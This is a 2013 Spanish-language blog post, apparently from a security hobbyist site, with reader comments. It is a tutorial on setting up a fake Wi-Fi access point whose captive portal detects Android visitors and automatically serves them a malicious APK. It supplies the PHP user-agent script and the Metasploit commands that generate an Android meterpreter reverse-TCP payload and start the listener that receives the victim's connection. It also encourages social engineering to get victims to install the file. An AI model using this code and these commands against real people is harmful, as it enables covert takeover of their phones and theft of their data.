sábado, 27 de julio de 2013

Punto de acceso falso: seduciendo androides

  Partiendo de la entrada anterior en la que se creaba un punto de acceso falso, en esta ocasión añadiremos unas pequeñas modificaciones a la pagina de inicio del portal cautivo para que cuando un cliente con un dispositivo Android se conecte se inicie automáticamente la descarga de una aplicación maliciosa, todo esto mediante un simple script en php y metasploit ;).

  Lo primero será el script que verá la víctima al conectarse al portal cautivo, como he comentado antes éste está escrito en php y es el siguiente:

 
 <?php
        $userAgent = $_SERVER[HTTP_USER_AGENT];
        $userAgent = strtolower ($userAgent);
        $file = "downloads/archivo.apk";
        if(strpos($userAgent, "android") !== false)
        {
                if (file_exists($file)) {
                        header('Content-Description: File Transfer');
                        header('Content-Type: application/vnd.android.package-archive');
                        header('Content-Disposition: attachment; filename='.basename($file));
                        header('Content-Transfer-Encoding: binary');
                        header('Expires: 0');
                        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                        header('Pragma: public');
                        header('Content-Length: ' . filesize($file));
                        ob_clean();
                        flush();
                        readfile($file);
                }

        }
?>
  La utilidad de dicho script es detectar mediante el User Agent el sistema operativo que visita la página y, si éste es un Android, automáticamente descargara el archivo apk creado para la ocasión.

  Para el ejecutable malicioso me aproveché de que metasploit ya contenía en su base de datos una versión de meterpreter, así que previo msfupdate con la ayuda de msfpayload me dispuse a generar el archivo apk que la víctima instalaría en su dispositivo:
msfpayload android/meterpreter/reverse_tcp LHOST=mi_ip R > archivo.apk

Ahora solo queda colocar el archivo.apk en la carpeta downloads en /var/www/ y cuando la desdichada víctima acceda al portal cautivo se le descargará y sugerirá la instalación de nuestro perverso archivo (para todo esto es importante jugar con la ingeniería social ;) ). Cuando el archivo sea instalado y ejecutado la víctima establecerá conexión con nuestro metasploit, aunque antes hay que ponerlo a la escucha:
msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E

 Y listo, tendremos una conexión mediante meterpreter con la víctima, aunque hay que tener en cuenta que el numero de posibilidades para "interactuar" con el objetivo es menor si es comparada con sistemas Windows o GNU/Linux.




  En resumen, hemos visto como con un sencillo script podemos dirigir ataques a distintos sistemas operativos en función del User Agent del navegador que acceda a la web. Además hay que tener en cuenta el factor de la ingeniería social, puesto que es importante mostrar una web creíble y una justificación por la que la víctima debería instalar nuestro apk.

Fuentes:


Nos leemos en breve.



5 0verl0ad Labs: Punto de acceso falso: seduciendo androides   Partiendo de la entrada anterior en la que se creaba un punto de acceso falso , en esta ocasión añadiremos unas pequeñas modificaciones a...

3 comentarios:

Hykeos dijo...

Muy buen post Aetsu ;)!

Anónimo dijo...

Y porqué un android y no un Iphone... Por preguntar... Es que los de android son gilipollas?

Aetsu Alpha dijo...

El ataque también funcionaria sobre un manzanaphone, bastaría jugar con el user agent y obviamente cambiar el archivo que se descarga en el equipo víctima.

Por cierto, se admiten donaciones de iphones para pruebas xD,

< >